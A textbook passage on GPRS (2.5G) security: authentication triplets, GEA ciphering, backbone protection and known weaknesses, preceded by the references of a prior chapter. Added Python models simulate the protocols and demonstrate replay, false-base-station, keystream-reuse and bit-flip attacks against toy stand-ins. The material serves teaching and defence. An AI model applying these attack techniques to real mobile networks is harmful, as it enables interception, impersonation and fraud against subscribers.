This chapter gives an overview of security management in next generation wireless networks. The AKA process is described and its extension to GPRS authentication and IMS authentication is further discussed in detail. The identified research challenges shall serve as guidance for further study to propose more efficient security protocols taking into account network architecture heterogeneity, the energy-security trade-offs, the mobility-security interaction, and comprehensive performance evaluation.

References

3rd Generation Partnership Project (3GPP) (1999). Technical specification core network; Mobile application part (MAP) specification. Technical Specification 3G TS 29.002 V3.7.0. Sophia Antipolis Cedex, France: Author.

3rd Generation Partnership Project (3GPP). Technical Specification Group Core Network; Mobile Radio Interface Layer 3 Specification; Core Network Protocols; Stage 3 (Release 1999). 3G TS 24.008 version 3.6.0 (2000-12). Sophia Antipolis Cedex, France: Author.

3rd Generation Partnership Project (3GPP). Technical Specification Group Services and Systems



Aspects; 3G Security; Security Architecture. Technical Specification 3G TS 33.102 V3.7.0 (2000-12). Sophia Antipolis Cedex, France: Author.

3rd Generation Partnership Project (3GPP). Technical Specification Group Services and Systems Aspects; General Packet Radio Service (GPRS); Service Description; Stage 2. Technical Specification 3G TS 23.060 version 3.6.0 (2001). Sophia Antipolis Cedex, France: Author.

3G TS 33.105, 3G Security; Cryptographic Algorithm Requirements.

3G TS 35.205, 3G Security; Specification of the MILENAGE Algorithm Set: An Example Algorithm Set for the 3GPP Authentication and Key Generation Functions f1, f1*, f2, f3, f4, f5, and f5*; Document 1: General.

3G TS 35.206, 3G Security; Specification of the MILENAGE Algorithm Set: An Example Algorithm Set for the 3GPP Authentication and Key Generation Functions f1, f1*, f2, f3, f4, f5, and f5*; Document 2: Algorithm Specification.

China Wireless Telecommunication Standard; 3G digital cellular telecommunications system; Security related network functions (Release 3); CWTS TSM 03.20 V3.0.0 (2002-08).

3rd Generation Partnership Project (3GPP). (2003). Technical specification core network; Cx and Dx interfaces based on the Diameter protocol; Protocol details. Tech. Spec. 3G TS 29.229 V5.3.0 (2003-03).

3rd Generation Partnership Project (3GPP). (2003). Technical specification core network; IP multimedia subsystem Cx and Dx interfaces; Signaling flows and message contents (Release 5). Tech. Spec. 3G TS 29.228 V5.4.0 (2003-06).

3rd Generation Partnership Project (3GPP). (2003). Technical specification group core network; Signaling flows for the IP multimedia call control based on SIP and SDP; Stage 3, version 5.0 (2003-06). 3GPP TS 24.228.

3rd Generation Partnership Project (3GPP). (2003). Technical specification group services and systems aspects; 3G security; Access security for IP-based services. Tech. Spec. 3G TS 33.203 V5.5.0 (2003-03).

3rd Generation Partnership Project (3GPP). (2003). Technical specification group services and systems aspects; IP Multimedia subsystem stage 2. Tech. Spec. 3G TS 23.228 version 6.2.0 (2003-06).

Al-Saraireh, J., & Yousef, S. (2006). Authentication transmission overhead between entities in mobile networks. International Journal of Computer Science and Network Security, 6(3B), 150-154.

Harn, L., & Hsin, W. (2003). On the security of wireless network access with enhancements. In Proceedings of Web Information Systems Engineering (WiSE'03) (pp. 88-95).

Liang, W., & Wang, W. (2005). A quantitative study of authentication and QoS in wireless IP networks. In Proceedings of IEEE INFOCOM'05.

Lin, Y., & Chen, Y. (2003). Reducing authentication signaling traffic in third-generation mobile network. IEEE Transactions on Wireless Communications, 2(3), 493-501.

Potlapally, N. R., Ravi, S., Raghunathan, A., & Jha, N. K. (2003). Analyzing the energy consumption of security protocols. In Proceedings of the International Symposium on Low Power Electronics and Design (pp. 30-35). ACM Press.

Rosenberg, J., Schulzrinne, H., Camarillo, G., Johnston, A., Peterson, J., Sparks, R., et al. (2002). SIP: Session initiation protocol (RFC 3261). Retrieved from http://www.ietf.org/rfc/rfc3261.txt

Zhang, M., & Fang, Y. (2005). Security analysis and enhancements of 3GPP authentication and key agreement protocol. IEEE Transactions on Wireless Communications, 4(2), 734-742.

Zhang, Y., & Fujise, M. (2006). An improvement for authentication protocol in third-generation wireless networks. IEEE Transactions on Wireless Communications, 5(9), 2348-2352.



Key Terms

Access security: Access security is the mechanism that provides mobile users with secure access to wireless services and protects against attacks on the radio access interface.

General Packet Radio Service (GPRS): GPRS is regarded as a 2.5 generation mobile system. It provides mobile data service to GSM users.

IP multimedia subsystem (IMS): IMS is the component that supports multimedia services in 3G systems.

Third generation (3G): 3G wireless communication systems are standardized to support multimedia services with high data rates.

Universal mobile telecommunications system (UMTS): UMTS is one of the third-generation wireless communication systems.



Chapter XXII
Security in 2.5G Mobile Systems
Christos Xenakis
University of Piraeus, Greece

Abstract

The global system for mobile communications (GSM) is the most popular standard that implements second generation (2G) cellular systems. 2G systems combined with general packet radio services (GPRS) are often described as 2.5G, that is, a technology between the 2G and third generation (3G) of mobile systems. GPRS is a service that provides packet radio access for GSM users. This chapter presents the security architecture employed in 2.5G mobile systems focusing on GPRS. More specifically, the security measures applied to protect the mobile users, the radio access network, the fixed part of the network, and the related data of GPRS are presented and analyzed in detail. This analysis reveals the security weaknesses of the applied measures that may lead to the realization of security attacks by adversaries. These attacks threaten network operation and data transfer through it, compromising end users and network security. To defeat the identified risks, current research activities on GPRS security propose a set of security improvements to the existing GPRS security architecture.

Introduction

The global system for mobile communications (GSM) is the most popular standard that implements second generation (2G) cellular systems. 2G systems combined with general packet radio services (GPRS) (3GPP TS 03.60, 2002) are often described as 2.5G, that is, a technology between the 2G and third generation (3G) of mobile systems. GPRS is a service that provides packet radio access for GSM users. The GPRS network architecture, which constitutes a migration step toward 3G systems, consists of an overlay network onto the GSM network. In the wireless part, the GPRS technology reserves radio resources only when there is data to be sent, thus ensuring the optimized utilization of radio resources. The fixed part of the network employs IP technology and is connected to the public Internet. Taking advantage of these features, GPRS enables the provision of a variety of packet-oriented multimedia applications and services to mobile users, realizing the concept of the mobile Internet.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.

For the successful implementation of the new emerging applications and services over GPRS, security is considered a vital factor. This is because wireless access is inherently less secure and radio transmission is by nature more susceptible to eavesdropping and fraudulent use than wire-line transmission. In addition, users' mobility and the universal access to the network imply higher security risks compared to those encountered in fixed networks. In order to meet its security objectives, GPRS uses a specific security architecture, which aims at protecting the network against unauthorized access and protecting the privacy of users. This architecture is mainly based on the security measures applied in GSM, since the GPRS system is built on the GSM infrastructure.

Based on the aforementioned consideration, the majority of the existing literature on security in 2.5G systems refers to GSM (Mitchell, 2001; Pagliusi, 2002). However, GPRS differs from GSM in certain operational and service points, which require a different security analysis. This is because GPRS is based on IP, which is an open and widely deployed technology that presents many vulnerable points. Similarly to IP networks, intruders into the GPRS system may attempt to breach confidentiality, integrity, or availability, or otherwise attempt to abuse the system or any part of it in order to compromise services or defraud users. Thus, the GPRS system is more exposed to intruders compared to GSM.

This chapter presents the security architecture employed in 2.5G mobile systems focusing on GPRS. More specifically, the security measures applied to protect the mobile users, the radio access network, the fixed part of the network, and the related data of GPRS are presented and analyzed in detail. This analysis reveals the security weaknesses of the applied measures that may lead to the realization of security attacks by adversaries. These attacks threaten network operation and data transfer through it, compromising end users and network security. To defeat the identified risks, current research activities on GPRS security propose a set of security improvements to the existing GPRS security architecture. The rest of this chapter is organized as follows. The next section briefly describes the GPRS network architecture. The third section presents the security architecture applied to GPRS and the fourth section analyzes its security weaknesses. The fifth section elaborates on the current research activities on GPRS security and the sixth section presents the conclusions.

GPRS Network Architecture

The network architecture of GPRS (3GPP TS 03.60, 2002) is presented in Figure 1. A GPRS user owns a mobile station (MS) that provides access to the wireless network. From the network side, the base station subsystem (BSS) is the network part responsible for the control of the radio path. The BSS consists of two types of nodes: the base station controller (BSC) and the base transceiver station (BTS). The BTS is responsible for the radio coverage of a given geographical area, while the BSC maintains radio connections towards MSs and terrestrial connections towards the fixed part of the network (core network).

The GPRS core network (CN) uses the network elements of GSM such as the home location register (HLR), the visitor location register (VLR), the authentication centre (AuC), and the equipment identity register (EIR). The HLR is a database used for the management of permanent data of mobile users. The VLR is a database of the service area visited by an MS and contains all the related information required for handling the MS's services. The AuC maintains security information related to subscriber identity, while the EIR maintains information related to mobile equipment identity. Finally, the mobile service switching centre (MSC) is a network element responsible for circuit-switched services (e.g., voice calls) (3GPP TS 03.60, 2002).

As presented previously, GPRS reuses the majority of the GSM network infrastructure. However, in order to build a packet-oriented mobile network some new network elements (nodes) are required, which handle packet-based traffic. The new class of nodes, called GPRS support nodes (GSN), is responsible for the delivery and routing of data packets between an MS and an external packet data network (PDN). More specifically, a serving



Figure 1. GPRS network architecture. The figure shows the MS attached over the Um interface to the BSS (BTS and BSC, linked by Abis), the BSS connected to the SGSN over Gb and to the MSC over A, and the core network (CN) elements SGSN, GGSN, HLR, AuC, VLR, EIR and MSC with their interfaces (Gn, Gp, Gi, Gr, Gc, Gf, D, E, H), the MSC's connection to the PSTN, and the GGSN's Gi interface towards external networks.

Legend:
AuC: Authentication Center
BTS: Base Transceiver Station
BSC: Base Station Controller
BSS: Base Station Subsystem
CN: Core Network
EIR: Equipment Identity Register
GGSN: Gateway GPRS Support Node
HLR: Home Location Register
MS: Mobile Station
MSC: Mobile Switching Center
SGSN: Serving GPRS Support Node
VLR: Visited Location Register

GSN (SGSN) is responsible for the delivery of data packets from, and to, an MS within its service area. Its tasks include packet routing and transfer, mobility management, logical link management, and authentication and charging functions. A gateway GSN (GGSN) acts as an interface between the GPRS backbone and an external PDN. It converts the GPRS packets coming from the SGSN into the appropriate packet data protocol (PDP) format (e.g., IP) and forwards them to the corresponding PDN; the GGSN performs the same function in the opposite direction. The communication between GSNs (i.e., SGSN and GGSN) is based on IP tunnels through the use of the GPRS tunneling protocol (GTP) (3GPP TS 09.60, 2002).

GPRS Security Architecture

In order to meet its security objectives, GPRS employs a set of security mechanisms that constitutes the GPRS security architecture. Most of these mechanisms were originally designed for GSM, but they have been modified to adapt to the packet-oriented nature of the traffic and to the GPRS network components. The GPRS security architecture mainly aims at two goals: (1) to protect the network against unauthorized access, and (2) to protect the privacy of users. It includes the following components (GSM 03.20, 1999):

• Subscriber identity module (SIM)
• Subscriber identity confidentiality
• Subscriber identity authentication



• User data and signaling confidentiality between the MS and the SGSN
• GPRS backbone security

Subscriber Identity Module (SIM)

The subscription of a mobile user to a network is personalized through the use of a smart card named SIM (ETSI TS 100 922, 1999). Each SIM card is unique and related to a user. It has a microcomputer with a processor, ROM, persistent EEPROM memory, volatile RAM, and an I/O interface. Its software consists of an operating system, a file system, and application programs (e.g., SIM application toolkit). The SIM card is responsible for the authentication of the user by prompting for a code (PIN), the identification of the user to the network through keys, and the protection of user data through cryptography. To achieve these functions it contains a set of security objects including:

• A (4-digit) PIN code, which is used to lock the card, preventing misuse;
• A unique permanent identity of the mobile user, named international mobile subscriber identity (IMSI) (3GPP TS 03.03, 2003);
• A secret key, Ki (128 bits), that is used for authentication; and
• An authentication algorithm (A3) and an algorithm that generates encryption keys (A8) (GSM 03.20, 1999).

Since the SIM card of a GSM/GPRS subscriber contains security critical information, it should be manufactured, provisioned, distributed, and managed in trusted environments.

Subscriber Identity Confidentiality

Subscriber identity confidentiality deals with the privacy of the IMSI and of the location of a mobile user. It includes mechanisms for the protection of the permanent identity (IMSI) when it is transferred in signaling messages, as well as measures that preclude the possibility of deriving it indirectly from listening to specific information, such as addresses, on the radio path. Subscriber identity confidentiality is mainly achieved by using a temporary mobile subscriber identity (TMSI) (3GPP TS 03.03, 2003; GSM 03.20, 1999), which identifies the mobile user in both the wireless and wired network segments. The TMSI has local significance and thus it must be accompanied by the routing area identity (RAI) in order to avoid confusion. Only the MS and the serving VLR and SGSN know the relation between the active TMSI and the IMSI. The allocation of a new TMSI corresponds implicitly, for the MS, to the de-allocation of the previous one. When a new TMSI is allocated to the MS, it is transmitted to it in ciphered mode. The MS stores the current TMSI and the associated RAI in non-volatile memory, so that these data are not lost when the MS is switched off.

Further to the TMSI, a temporary logical link identity (TLLI) (3GPP TS 03.20) also identifies a GPRS user on the radio interface of a routing area. Since the TLLI has local significance, when it is exchanged between the MS and the SGSN it should be accompanied by the RAI. The TLLI is either derived from the TMSI allocated by the SGSN or built randomly by the MS and thus provides identity confidentiality. The relation between the TLLI and the IMSI is only known in the MS and in the SGSN.

Subscriber Identity Authentication

A mobile user that attempts to access the network must first prove his/her identity to it. User authentication (3GPP TS 03.60, 2002) protects against fraudulent use and ensures correct billing. GPRS uses the authentication procedure already defined in GSM, with the same algorithms for authentication and encryption key generation and the same secret key, Ki (see Figure 2). However, from the network side, the whole procedure is executed by the SGSN (instead of the MSC/VLR) and employs a different random number (GPRS-RAND); thus it produces a different signed response (GPRS-SRES) and encryption key (GPRS-Kc) than the GSM voice counterpart.

To achieve authentication of a mobile user, the serving SGSN must possess security-related



Figure 2. GPRS authentication. The fixed network of the GPRS operator sends an Authentication Request carrying GPRS-RAND; the SIM runs A3 over GPRS-RAND under Ki and returns an Authentication Response carrying GPRS-SRES, which the network checks against its own A3 result; both sides then run A8 under Ki to obtain GPRS-Kc, the key used by A5 (GEA) to produce the protected data.

information for the specific user. This information is obtained by requesting it from the HLR/AuC of the home network to which the mobile user is subscribed. It includes a set of authentication vectors (triplets), each of which contains a random challenge (GPRS-RAND), the related signed response (GPRS-SRES), and the encryption key (GPRS-Kc) for the specific subscriber. The authentication vectors are produced by the home HLR/AuC using the secret key Ki of the mobile subscriber.

During authentication the SGSN of the serving network sends the random challenge (GPRS-RAND) of a chosen authentication vector to the MS. The MS processes the GPRS-RAND with the A3 algorithm, which is implemented in the SIM card, keyed with the secret key Ki. The first 32 bits of the output are used as the signed response (GPRS-SRES) to the challenge and are sent back to the network. The SGSN compares the received GPRS-SRES with the one in the authentication vector; if they match, the MS has proven possession of the correct Ki and the mobile subscriber is recognized as an authorized user. Otherwise, the serving network (SN) rejects the subscriber's access to the system. The remaining 64 bits of the output, which the A8 algorithm derives from the same GPRS-RAND and Ki, form the GPRS encryption key (GPRS-Kc).

Data and Signalling Protection

User data and signaling protection over the GPRS radio access network is based on the GPRS ciphering algorithm (GPRS-A5) (3GPP TS 01.61, 2001), which is also referred to as the GPRS encryption algorithm (GEA) and is similar to the GSM A5. Currently, there are three versions of this algorithm: GEA1, GEA2, and GEA3, the last built on the same KASUMI block cipher as A5/3. GEA1 and GEA2 have not been published, which makes attacks on them harder to mount; their secrecy is no guarantee of strength, however, since the equally unpublished COMP128 discussed below was reverse engineered and cryptanalyzed. The MS device (not the SIM card) performs GEA using the encryption key (GPRS-Kc), since it is a strong algorithm that requires relatively high processing capabilities. From the network side, the serving SGSN performs the ciphering/deciphering functionality, protecting signaling and user data over the Um, Abis, and Gb interfaces.

During authentication the MS indicates which version(s) of GEA it supports and the network (SGSN) decides on a mutually acceptable version that will be used. If there is no commonly accepted algorithm, the network (SGSN) may decide to release the connection. Both the MS and the SGSN must cooperate in order to initiate ciphering over the radio access network. More specifically, the SGSN indicates whether ciphering should be used or not (no ciphering is also a possible option) in the Authentication Request message, and the MS starts ciphering after sending the Authentication Response message (see Figure 2).
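The triplet exchange of Figure 2, modelled end to end as an added example (this is not the chapter's code; A3/A8 are stood in by HMAC-SHA256 because the operator-specific algorithms such as COMP128 are not reproduced here, and the IMSI, Ki and batch size of five triplets are constructed values). It shows the SGSN fetching triplets from the HLR/AuC, the SIM answering GPRS-RAND with GPRS-SRES and deriving GPRS-Kc, and two consequences of the design that the weaknesses section later returns to: the SIM answers any challenger, and an SGSN that recycles triplets accepts a replayed response.

```python
"""Model of the GPRS triplet authentication run (GPRS-RAND / GPRS-SRES / GPRS-Kc).

Added example, not the chapter's code.  A3/A8 are stood in by HMAC-SHA256
(assumption); the operator's real algorithms (e.g. COMP128) are not modelled.
"""
from __future__ import annotations

import hashlib
import hmac
import secrets

IMSI = "234150000000001"     # constructed subscriber identity
KI = bytes(range(16))        # constructed 128-bit Ki, held only by SIM and AuC
BATCH = 5                    # constructed size of a triplet batch fetched over Gr


def a3_a8(ki: bytes, rand: bytes) -> tuple[bytes, bytes]:
    """Stand-in for the SIM's A3/A8 pair: first 32 bits of one keyed function
    serve as GPRS-SRES (A3), the next 64 bits as GPRS-Kc (A8)."""
    digest = hmac.new(ki, rand, hashlib.sha256).digest()
    return digest[:4], digest[4:12]


class HlrAuc:
    """Home HLR/AuC: the only network element holding Ki; produces triplets."""

    def __init__(self) -> None:
        self._ki: dict[str, bytes] = {}

    def provision(self, imsi: str, ki: bytes) -> None:
        self._ki[imsi] = ki

    def triplets(self, imsi: str, count: int = BATCH) -> list[tuple[bytes, bytes, bytes]]:
        out = []
        for _ in range(count):
            rand = secrets.token_bytes(16)        # fresh 128-bit GPRS-RAND per triplet
            sres, kc = a3_a8(self._ki[imsi], rand)
            out.append((rand, sres, kc))
        return out


class Sgsn:
    """Serving SGSN. reuse_triplets=True models the weakness of recycling used
    triplets instead of fetching new ones from the home network."""

    def __init__(self, hlr: HlrAuc, reuse_triplets: bool = False) -> None:
        self._hlr, self._reuse = hlr, reuse_triplets
        self._fresh: dict[str, list] = {}
        self._used: dict[str, list] = {}
        self._pending: dict[str, tuple[bytes, bytes, bytes]] = {}

    def authentication_request(self, imsi: str) -> bytes:
        """Pick one triplet and send its GPRS-RAND to the MS."""
        fresh = self._fresh.setdefault(imsi, [])
        if not fresh:
            if self._reuse and self._used.get(imsi):
                fresh.extend(self._used.pop(imsi))      # recycle: old RANDs go out again
            else:
                fresh.extend(self._hlr.triplets(imsi))  # Gr round trip to the home network
        triplet = fresh.pop(0)
        self._pending[imsi] = triplet
        return triplet[0]

    def authentication_response(self, imsi: str, sres: bytes) -> bytes | None:
        """Constant-time GPRS-SRES check; GPRS-Kc on success, None on reject."""
        triplet = self._pending.pop(imsi)
        self._used.setdefault(imsi, []).append(triplet)
        return triplet[2] if hmac.compare_digest(triplet[1], sres) else None


class Sim:
    """SIM: answers whatever RAND it is given; it cannot authenticate the sender."""

    def __init__(self, ki: bytes) -> None:
        self._ki, self.kc = ki, None

    def respond(self, rand: bytes) -> bytes:
        sres, self.kc = a3_a8(self._ki, rand)
        return sres


def legitimate_run() -> bool:
    """Both sides end up holding the same GPRS-Kc."""
    hlr = HlrAuc()
    hlr.provision(IMSI, KI)
    sgsn, sim = Sgsn(hlr), Sim(KI)
    kc = sgsn.authentication_response(IMSI, sim.respond(sgsn.authentication_request(IMSI)))
    return kc is not None and kc == sim.kc


def false_bs_gets_answer() -> bool:
    """One-way authentication: a false BS sends any RAND and still obtains a valid
    (RAND, SRES) pair to replay later or to attack offline."""
    attacker_rand = bytes(16)
    return Sim(KI).respond(attacker_rand) == a3_a8(KI, attacker_rand)[0]


def replay_succeeds(reuse_triplets: bool) -> bool:
    """Replay a captured (RAND, SRES) pair once the SGSN has exhausted its batch.
    Works only if the SGSN recycles triplets, i.e. issues an old RAND again."""
    hlr = HlrAuc()
    hlr.provision(IMSI, KI)
    sgsn, sim = Sgsn(hlr, reuse_triplets), Sim(KI)
    captured: dict[bytes, bytes] = {}
    for _ in range(BATCH):                               # eavesdrop BATCH legitimate runs
        rand = sgsn.authentication_request(IMSI)
        captured[rand] = sim.respond(rand)
        sgsn.authentication_response(IMSI, captured[rand])
    rand = sgsn.authentication_request(IMSI)             # next run: recycled or fresh RAND?
    if rand in captured:
        return sgsn.authentication_response(IMSI, captured[rand]) is not None
    sgsn.authentication_response(IMSI, bytes(4))         # no SRES known for a fresh RAND
    return False


if __name__ == "__main__":
    print(legitimate_run(), false_bs_gets_answer(), replay_succeeds(True), replay_succeeds(False))
```

The `reuse_triplets` switch is the only difference between the two SGSN behaviours; with it off, a replayed response fails because the SGSN never issues a RAND it has already consumed.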



Figure 3. GPRS ciphering. On each side (SGSN/MS and MS/SGSN) the cipher algorithm takes GPRS-Kc, INPUT and DIRECTION and produces OUTPUT; the sender XORs PLAIN TEXT with OUTPUT to obtain CIPHERED TEXT, and the receiver XORs CIPHERED TEXT with the same OUTPUT to recover PLAIN TEXT.

GEA is a symmetric stream cipher algorithm (see Figure 3) that uses three input parameters (GPRS-Kc, INPUT, and DIRECTION) and produces an OUTPUT string, which varies between 5 and 1,600 bytes. GPRS-Kc (64 bits) is the encryption key generated by the GPRS authentication procedure and is never transmitted over the radio interface. The INPUT parameter (32 bits) is used as an additional input so that each frame is ciphered with a different output string. This parameter is calculated from the logical link control (LLC) frame number, a frame counter, and a value supplied by the SGSN called the input offset value (IOV). The IOV is set up during the negotiation of LLC and layer 3 parameters. Finally, the direction bit (DIRECTION) specifies whether the output string is used for upstream or downstream communication.

After the initiation of ciphering, the sender (MS or SGSN) XORs the OUTPUT string bit-wise with the payload (PLAIN TEXT) to produce the CIPHERED TEXT, which is sent over the radio interface. The receiving entity (SGSN or MS) obtains the original PLAIN TEXT by XORing the same OUTPUT string with the CIPHERED TEXT. When the MS changes SGSN, the encryption parameters (e.g., GPRS-Kc, INPUT) are transferred from the old SGSN to the new SGSN through the (inter-SGSN) routing area update procedure in order to guarantee service continuity.
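The ciphering function of Figure 3, as an added example that is not the chapter's code. The keystream generator is a stand-in (HMAC-SHA256 in counter mode, an assumption; GEA1, GEA2 and GEA3 are not reproduced), the formula combining the LLC frame number, a counter and the IOV into INPUT is a simplified assumption rather than the one in the 3GPP specifications, and Kc and IOV are constructed values. It goes beyond the round trip described above in two ways: it shows what the per-frame INPUT exists to prevent (two frames ciphered under the same INPUT leak the XOR of their plaintexts) and what the missing integrity protection noted in the weaknesses section allows (a ciphertext bit flip that the receiver decrypts as a changed address).

```python
"""Model of GPRS ciphering (Figure 3): OUTPUT = f(GPRS-Kc, INPUT, DIRECTION),
CIPHERED TEXT = PLAIN TEXT XOR OUTPUT.

Added example, not the chapter's code.  The keystream generator and the INPUT
formula are stand-ins (assumptions); GEA1/GEA2/GEA3 are not reproduced.
"""
from __future__ import annotations

import hashlib
import hmac

KC = bytes.fromhex("0123456789abcdef")   # constructed 64-bit GPRS-Kc from the auth run
IOV = 0x1A2B3C4D                         # constructed input offset value from the SGSN
UPLINK, DOWNLINK = 0, 1                  # DIRECTION bit
MIN_OUT, MAX_OUT = 5, 1600               # OUTPUT length bounds given in the chapter


def gprs_input(frame_number: int, overflow_counter: int = 0, iov: int = IOV) -> int:
    """32-bit INPUT from LLC frame number, overflow counter and IOV.
    Simplified assumption, not the specification's formula:
    (IOV + N + 2^16 * OC) mod 2^32."""
    return (iov + frame_number + (overflow_counter << 16)) & 0xFFFFFFFF


def keystream(kc: bytes, inp: int, direction: int, length: int) -> bytes:
    """Stand-in for the GEA core: HMAC-SHA256 in counter mode over (INPUT, DIRECTION)."""
    if len(kc) != 8 or direction not in (UPLINK, DOWNLINK):
        raise ValueError("Kc must be 64 bits and DIRECTION 0 or 1")
    if not MIN_OUT <= length <= MAX_OUT:
        raise ValueError("OUTPUT length outside 5..1600 bytes")
    out = bytearray()
    counter = 0
    while len(out) < length:
        msg = inp.to_bytes(4, "big") + bytes([direction]) + counter.to_bytes(4, "big")
        out += hmac.new(kc, msg, hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def gea_xor(kc: bytes, inp: int, direction: int, data: bytes) -> bytes:
    """Encryption and decryption are the same operation: data XOR OUTPUT."""
    return bytes(a ^ b for a, b in zip(data, keystream(kc, inp, direction, len(data))))


def round_trip() -> bool:
    """MS ciphers an uplink frame; the SGSN deciphers with identical parameters.
    A DIRECTION mismatch selects a different OUTPUT and yields garbage."""
    frame = b"user payload, frame 0"
    inp = gprs_input(frame_number=0)
    ciphered = gea_xor(KC, inp, UPLINK, frame)
    return (gea_xor(KC, inp, UPLINK, ciphered) == frame
            and gea_xor(KC, inp, DOWNLINK, ciphered) != frame)


def keystream_reuse_leak() -> bool:
    """Two frames ciphered under the same INPUT (e.g. a wrapped counter): XOR of the
    ciphertexts equals XOR of the plaintexts, so one known frame reveals the other."""
    p1, p2 = b"GET /index.html ", b"POST /login.php "
    inp = gprs_input(frame_number=7)
    c1, c2 = gea_xor(KC, inp, UPLINK, p1), gea_xor(KC, inp, UPLINK, p2)
    xor_c = bytes(a ^ b for a, b in zip(c1, c2))
    xor_p = bytes(a ^ b for a, b in zip(p1, p2))
    return xor_c == xor_p


def flip_address_in_transit() -> bytes:
    """No integrity protection on the GPRS radio path: knowing where a field sits and
    what it says, an attacker rewrites it inside the ciphertext and the receiver
    decrypts the forgery unnoticed. Returns what the SGSN would forward."""
    plain = b"dst=10.0.0.1"
    inp = gprs_input(frame_number=3)
    ciphered = bytearray(gea_xor(KC, inp, UPLINK, plain))
    idx = plain.index(b"0.1") + 2                 # position of the last digit
    ciphered[idx] ^= ord("1") ^ ord("9")          # '1' -> '9' under XOR-based ciphering
    return gea_xor(KC, inp, UPLINK, bytes(ciphered))


if __name__ == "__main__":
    print(round_trip(), keystream_reuse_leak(), flip_address_in_transit())
```

The two attacks work against any stream cipher used this way, which is why the keystream selector (INPUT) must never repeat under one Kc and why a separate integrity mechanism is needed; neither property depends on the strength of the GEA core itself.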
GPRS Backbone Security

The GPRS backbone network includes the fixed network elements and their physical connections that convey user data and signaling information. The signaling exchange in GPRS is mainly based on signaling system 7 (SS7) technology (3GPP TS 09.02, 2004), which does not support any security measure for the GPRS deployment. Similarly, the GTP protocol that is employed for communication between GSNs does not support security. Thus, user data and signaling information in the GPRS backbone network are conveyed in cleartext, exposing them to various security threats. In addition, inter-network communications (between different operators) are based on the public Internet, which enables IP spoofing by any malicious third party who gets access to it. In the sequel, the security measures applied to the GPRS backbone network are presented.

The responsibility for security protection of the GPRS backbone as well as of inter-network communications belongs to the mobile operators. They utilize private IP addressing and network address translation (NAT) (Srisuresh & Holdrege, 1999) to restrict unauthorized access to the GPRS backbone. They may also apply firewalls at the borders of the GPRS backbone network in order to protect it from unauthorized penetration. Firewalls protect the network by enforcing security policies (e.g., user traffic addressed to a network element is discarded). Using security policies the GPRS operator may ensure that only traffic initiated from the MS, and not from the Internet, passes through a firewall. This is done for two reasons: (1) to restrict traffic in order to protect the MS and the network elements from external attacks; and (2) to protect the MS



from receiving unrequested traffic. Unrequested traffic may be unwanted by the mobile subscribers, since they pay for the traffic received as well. The GPRS operator may also want to disallow some bandwidth-demanding protocols, preventing a group of subscribers from consuming so much bandwidth that other subscribers are noticeably affected. In addition, application-level firewalls prevent direct access through the use of proxies for services, which analyze application commands, perform authentication, and keep logs.

Since firewalls do not provide privacy and confidentiality, virtual private network (VPN) technology (Gleeson, Lin, Heinanen, Armitage, & Malis, 2000) has to complement them to protect data in transit. A VPN is used for the authentication and authorization of user access to corporate resources, the establishment of secure tunnels between the communicating parties, and the encapsulation and protection of the data transmitted over the network. In current GPRS implementations, pre-configured, static VPNs can be employed to protect data transfer between GPRS network elements (e.g., an SGSN and a GGSN that belong to the same backbone), between different GPRS backbone networks that belong to different mobile operators, or between a GPRS backbone and a remote corporate private network. The border gateway, which resides at the border of the GPRS backbone, is a network element that provides firewall capabilities and also maintains static, pre-configured VPNs to specific peers.

GPRS Security Weaknesses

Although GPRS has been designed with security in mind, it presents some essential security weaknesses, which may lead to the realization of security attacks that threaten network operation and data transfer through it. In the following, the most prominent security weaknesses of the GPRS security architecture are briefly presented and analyzed.

Subscriber Identity Confidentiality

A serious weakness of the GPRS security architecture is related to the compromise of the confidentiality of the subscriber identity. Specifically, whenever the serving network (VLR or SGSN) cannot associate the TMSI with the IMSI, because of TMSI corruption or database failure, the SGSN should request the MS to identify itself by means of the IMSI on the radio path. Furthermore, when the user roams and the new serving network cannot contact the previous one (the old serving network) or cannot retrieve the user identity, then the new serving network should also request the MS to identify itself by means of the IMSI on the radio path. This fact allows an active attacker to pretend to be a new serving network, to which the user has to reveal his/her permanent identity. In addition, in both cases the IMSI that represents the permanent user identity is conveyed in cleartext over the radio interface, violating user identity confidentiality.

Subscriber Authentication

The authentication mechanism used in GPRS also exhibits some weak points regarding security. More specifically, the authentication procedure is one-way and thus it does not assure that a mobile user is connected to an authentic serving network. This fact enables active attacks using a false BS identity. An adversary, who has the required equipment, may masquerade as a legitimate network element, mediating in the communication between the MS and the authentic BS. This is also facilitated by the absence of a data integrity mechanism on the radio access network of GPRS, a mechanism that would defeat certain network impersonation attacks. The results of this mediation may be the alteration or the interception of signaling information and communication data exchanged.

Another weakness of the GPRS authentication procedure is related to the implementation of the A3 and A8 algorithms, which are often realized in practice using COMP128. COMP128 is a keyed hash function, which uses two 16-byte (128-bit)


Security in 2.5G Mobile Systems

inputs and produces a hash output of 12 bytes (96 bits). While the actual specification of COMP128 was never made public, the algorithm has been reverse engineered and cryptanalyzed (Barkan, Biham, & Neller, 2003). Thus, knowing the secret key, Ki, it is feasible for a third party to clone a GSM/GPRS SIM card, since its specifications are widely available (ETSI TS 100 922, 1999).

The last weakness of the GPRS authentication procedure is related to the network's ability to reuse authentication triplets. Each authentication triplet should be used in only one authentication procedure in order to avoid man-in-the-middle and replay attacks. However, this depends on the mobile network operators (home and serving) and cannot be checked by mobile users. When the VLR of a serving network has used an authentication triplet to authenticate an MS, it shall delete the triplet or mark it as used. Thus, each time that the VLR needs to use an authentication triplet, it shall use an unmarked one in preference to a marked one. If there is no unmarked triplet, then the VLR shall request fresh triplets from the home HLR. If fresh triplets cannot be obtained, because of a system failure, the VLR may reuse a marked triplet. Thus, if a single triplet is compromised, a false BS can impersonate a genuine GPRS network to the MS. Moreover, as the false BS has the encryption key, Kc, it will not be necessary for the false BS to suppress encryption on the air interface. As long as the genuine SGSN is using the compromised authentication triplet, an attacker could also impersonate the MS and obtain session calls that are paid by the legitimate subscriber.

Data and Signalling Protection

An important weakness of the GPRS security architecture is related to the fact that the encryption of signalling and user data over the highly exposed radio interface is not mandatory. Some GPRS operators, in certain countries, never switch on encryption in their networks, since the legal framework in these countries does not permit it. Hence, in these cases signaling and data traffic are conveyed in cleartext over the radio path. This situation becomes even more risky given that the involved end users (humans) are not informed whether their sessions are encrypted or not.

